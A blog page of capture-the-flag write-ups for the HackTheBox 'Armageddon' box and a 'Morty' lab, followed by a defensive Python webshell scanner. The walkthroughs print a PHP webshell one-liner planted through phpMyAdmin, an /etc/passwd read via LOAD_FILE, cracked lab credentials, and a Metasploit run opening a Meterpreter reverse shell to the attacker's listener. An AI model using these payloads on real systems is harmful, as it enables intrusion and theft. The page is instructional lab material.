Month: March 2021
htb-armageddon-nl
Introduction@Armageddon:~$
| Column | Details |
|---|---|
| Name | armageddon |
| IP | 10.10.10.233 |
| Points | 20 |
| OS | Linux |
| Difficulty | Easy |
| Creator | bertolis |
| Out On | 27 Mar 2021 |
Pwned
```
➜ armageddon git:(master) ✗ ssh root@armageddon.htb
root@armageddon.htb
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-26-generic x86_64)

 System information as of Thu 21 May 2020 06:11:30 AM UTC

 System load:      0.07
 Usage of /:       46.0% of 15.68GB
 Memory usage:     13%
 Swap usage:       0%
 Processes:        218
 Users logged in:  2
 IPv4 address for br-836575a2ebbb: 172.20.0.1
 IPv4 address for br-8ec6dcae5ba1: 172.30.0.1
 IPv4 address for docker0:         172.17.0.1
 IPv4 address for eth0:            10.10.10.233

Last login: Thu May 21 06:11:12 2020 from 10.10.XX.XX
```
Recon
Nmap
Two ports are open: 22 (SSH) and 80 (HTTP).
Port-80
There is a simple login page. Let's check the source code for some juicy stuff. I found the Drupal version: "Drupal 7".

Let's search Google for an exploit for this specific version. Found a Rapid7 page. Let's try this real quick. We got the shell.
Now let's enumerate some good stuff. I found an interesting file called settings.php inside the /var/www/html/sites/default/ directory, which contains the MySQL creds. But before connecting to MySQL, let's spawn a stable shell first.
The python3 tty shell doesn't spawn, so let's try connecting to MySQL without a tty shell. It gives us an error, so let's try another mysql command. That works; let's fetch the tables inside the drupal database.
Now let's dump the usernames and hashes inside the users table. Now that we have the hashes, let's try to crack them. We got the password for brucetherealadmin:booboo. Let's SSH in real quick and get user.txt.
Privilege escalation
Before running linpeas, let's try manually first. Let's Google for privilege escalation.

Link: Privilege Escalation in Ubuntu Linux (dirty_sock exploit)

The GitHub Python script doesn't work in this case, so from this script we only need the base64 string; we decode the base64 string and save it in a file.

Important: if you can't "su dirty_sock", reset the box and try again; in my case it worked the second time.
And we pwned it...

If you liked the writeup, support a student to get the OSCP cert:
Donation for OSCP
Resources
| Topic | Url |
|---|---|
| Drupal Drupalgeddon 2 Forms API Property Injection | https://www.rapid7.com/db/modules/exploit/unix/webapp/drupal_drupalgeddon2/ |
| Privilege Escalation in Ubuntu Linux (dirty_sock exploit) | https://shenaniganslabs.io/2019/02/13/Dirty-Sock.html |
| dirty_sock: Linux Privilege Escalation (via snapd) | https://github.com/initstring/dirty_sock/blob/master/dirty_sockv2.py |
Hash -> OhKUwkvR$.uL.mlYJOz.ubK/FmXouGbU7vCVCG9s00K7R.ny9ryM.vXNdwZhOGCcq7e3XcbA5UpqUp.9eKY4hfLy9m5aU7/
ptd-morty-private
```
┌─[✗]─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $cat allports.nmap
# Nmap 7.91 scan initiated Fri Mar 5 15:11:41 2021 as: nmap -A -oN allports.nmap 10.150.150.57
Nmap scan report for mortysserver.com (10.150.150.57)
Host is up (0.031s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e8:60:09:66:aa:1f:e8:76:d8:84:16:18:1c:e4:ee:32 (RSA)
|   256 92:09:d3:0e:f9:47:48:03:9f:32:9f:0f:17:87:c2:a4 (ECDSA)
|_  256 1d:d1:b3:2b:24:dc:c2:8a:d7:ca:44:39:24:c3:af:3d (ED25519)
53/tcp open  domain  ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.16.1-Ubuntu
80/tcp open  http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 5 15:11:58 2021 -- 1 IP address (1 host up) scanned in 16.41 seconds
┌─[user@parrot-virtual]─[~/ptd/morty]
```
```
┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $curl http://10.150.150.57/note.html
Morty, <br>
if you read this: I've already configured your domain 'mortysserver.com' on this server, don't bother me with it anymore!! <br>
-Rick
┌─[user@parrot-virtual]─[~/ptd/morty]
```
Add `10.150.150.57 mortysserver.com` to /etc/hosts.
```
┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $cat secret.txt
Fl4sk#!
┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $md5sum screen.jpeg
df7eb9983c329c32408c5a6be270b3f1  screen.jpeg
┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $steghide --info screen.jpeg
"screen.jpeg":
  format: jpeg
  capacity: 10.4 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
  embedded file "keytotheuniverse.txt":
    size: 24.0 Byte
    encrypted: rijndael-128, cbc
    compressed: yes
┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $steghide extract -sf screen.jpeg
Enter passphrase: Fl4sk#!
wrote extracted data to "keytotheuniverse.txt".
┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $ls -la
total 212
drwxr-xr-x 1 user user    108 Mar 11 11:12 .
drwxr-xr-x 1 user user   2164 Mar  5 15:10 ..
-rw-r--r-- 1 user user   1016 Mar  5 15:11 allports.nmap
-rw-r--r-- 1 user user     24 Mar 11 11:12 keytotheuniverse.txt
-rw-r--r-- 1 user user 204432 Mar  8 09:32 screen.jpeg
-rw-r--r-- 1 user user      9 Mar 11 11:11 secret.txt
┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $cat keytotheuniverse.txt
rick:WubbaLubbaDubDub1!
```
```
┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $dig axfr @10.150.150.57

; <<>> DiG 9.16.8-Debian <<>> axfr @10.150.150.57
; (1 server found)
;; global options: +cmd
;; Query time: 33 msec
;; SERVER: 10.150.150.57#53(10.150.150.57)
;; WHEN: Fri Mar 12 11:46:00 GMT 2021
;; MSG SIZE  rcvd: 56

┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $dig axfr @10.150.150.57 mortysserver.com

; <<>> DiG 9.16.8-Debian <<>> axfr @10.150.150.57 mortysserver.com
; (1 server found)
;; global options: +cmd
mortysserver.com.                   900 IN SOA 10.150.150.57. email.mortysserver.com. 1 900 900 604800 900
mortysserver.com.                   900 IN NS  10.150.150.57.
rickscontrolpanel.mortysserver.com. 900 IN A   10.150.150.57
mortysserver.com.                   900 IN SOA 10.150.150.57. email.mortysserver.com. 1 900 900 604800 900
;; Query time: 29 msec
;; SERVER: 10.150.150.57#53(10.150.150.57)
;; WHEN: Fri Mar 12 11:47:13 GMT 2021
;; XFR size: 4 records (messages 1, bytes 212)
┌─[user@parrot-virtual]─[~/ptd/morty]
```
We add to our /etc/hosts : 10.150.150.57 mortysserver.com rickscontrolpanel.mortysserver.com email.mortysserver.com
We access http://rickscontrolpanel.mortysserver.com and find FLAG1=921e4db975bda77543cfe83fbe176d15e09ce7e2

We log on to this phpMyAdmin site as rick:WubbaLubbaDubDub1! and find FLAG2=e39c995fbf614c5c38ca7343f59cc310e5880251
In phpMyAdmin, create a database first, then execute the query:

```
SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/backdoor.php"
```

We get:

```
Error
SQL query: Documentation
SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/backdoor.php"
MySQL said: Documentation
#1 - Can't create/write to file '/var/www/backdoor.php' (Errcode: 13 "Permission denied")
```

So we can't write there (writing to /tmp is allowed).
```
SELECT LOAD_FILE('/etc/passwd');
```

```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
morty:x:1000:1000:Morty Smith:/home/morty:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
bind:x:112:118::/var/cache/bind:/usr/sbin/nologin
mysql:x:113:119:MySQL Server,,,:/nonexistent:/bin/false
```
Wappalyzer shows phpMyAdmin version 4.8.1.

We can then use https://medium.com/@happyholic1203/phpmyadmin-4-8-0-4-8-1-remote-code-execution-257bcc146f8e#:~:text=from%20PMA%204.8.-,0%20~%204.8.,PHP%20code%20on%20the%20server or use the Metasploit module multi/http/phpmyadmin_lfi_rce:
```
msf6 exploit(multi/http/phpmyadmin_lfi_rce) > show options

Module options (exploit/multi/http/phpmyadmin_lfi_rce):

   Name       Current Setting                     Required  Description
   ----       ---------------                     --------  -----------
   PASSWORD   WubbaLubbaDubDub1!                  no        Password to authenticate with
   Proxies                                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.150.150.57                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80                                  yes       The target port (TCP)
   SSL        false                               no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                                   yes       Base phpMyAdmin directory path
   USERNAME   rick                                yes       Username to authenticate with
   VHOST      rickscontrolpanel.mortysserver.com  no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.66.66.42      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic
```
```
msf6 exploit(multi/http/phpmyadmin_lfi_rce) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.66.66.42:4444
msf6 exploit(multi/http/phpmyadmin_lfi_rce) >
[*] Sending stage (39282 bytes) to 10.150.150.57
[*] Meterpreter session 1 opened (10.66.66.42:4444 -> 10.150.150.57:42974) at 2021-03-13 14:58:15 +0000

msf6 exploit(multi/http/phpmyadmin_lfi_rce) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information            Connection
  --  ----  ----                   -----------            ----------
  1         meterpreter php/linux  www-data (33) @ morty  10.66.66.42:4444 -> 10.150.150.57:42974 (10.150.150.57)

msf6 exploit(multi/http/phpmyadmin_lfi_rce) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 9802 created.
Channel 0 created.
cd user/morty
cat FLAG3.txt
73ce6cecfc1109f1e43d379fd9922dcc699af321
```
Later I found that I could write to the phpMyAdmin directory:

```
echo '<?php system($_GET['cmd']); ?>' > shell.php
pwd
/var/www/html/rickscontrolpanel/public_html/phpmyadmin
```

and then access http://rickscontrolpanel.mortysserver.com/shell.php?cmd=whoami
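As an added defensive example that is not part of the original writeup, the Python below flags PHP files that pass a request parameter straight into a shell-execution sink (the pattern of the one-liner dropped into the web root above) and then correlates Apache access-log lines against the flagged files; the web-root contents, IPs, timestamps and log lines are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Shell-execution sinks and request superglobals: the writeup's one-liner is
# system($_GET['cmd']), a request parameter passed straight to a sink.
SINKS = r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)"
SUPERGLOBALS = r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\["
WEBSHELL_RE = re.compile(SINKS + r"\s*\(\s*" + SUPERGLOBALS)
# Apache combined-log request line: client, request target, status.
LOG_RE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample web root (path -> PHP source); only shell.php is a webshell.
WEBROOT = {
    "/var/www/html/index.php": "<?php echo htmlspecialchars($_GET['name']); ?>",
    "/var/www/html/shell.php": "<?php system($_GET['cmd']); ?>",
}
# Constructed access-log lines; IPs, timestamps and user agents are made up.
ACCESS_LOG = [
    '10.66.66.42 - - [13/Mar/2021:15:02:11 +0000] "GET /shell.php?cmd=whoami HTTP/1.1" 200 9 "-" "curl/7.74.0"',
    '10.66.66.42 - - [13/Mar/2021:15:02:30 +0000] "GET /index.php?name=rick HTTP/1.1" 200 120 "-" "Mozilla/5.0"',
]

def scan_php_source(path, source):
    """Return (path, matched call) when the source hands a request parameter to a sink."""
    m = WEBSHELL_RE.search(source)
    return (path, m.group(0)) if m else None

def suspicious_requests(log_lines, flagged_url_paths):
    """Return (client_ip, url_path, cmd, status) for every hit on a flagged file."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        ip, target, status = m.groups()
        parts = urlsplit(target)
        if parts.path in flagged_url_paths:
            cmd = parse_qs(parts.query).get("cmd", [""])[0]
            hits.append((ip, parts.path, cmd, int(status)))
    return hits

def run(webroot=WEBROOT, log_lines=ACCESS_LOG, docroot="/var/www/html"):
    """Scan the web root, then correlate the access log against the flagged files."""
    flagged = [r for r in (scan_php_source(p, s) for p, s in webroot.items()) if r]
    url_paths = {p[len(docroot):] for p, _ in flagged}  # filesystem path -> URL path
    return flagged, suspicious_requests(log_lines, url_paths)

if __name__ == "__main__":
    print(run())
```

On a real host the same two functions would be fed the PHP files under the document root and the live access log; a hit on a file that no deployment created is the signal to preserve the file and the log before cleaning up.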
Author : Puckiestyle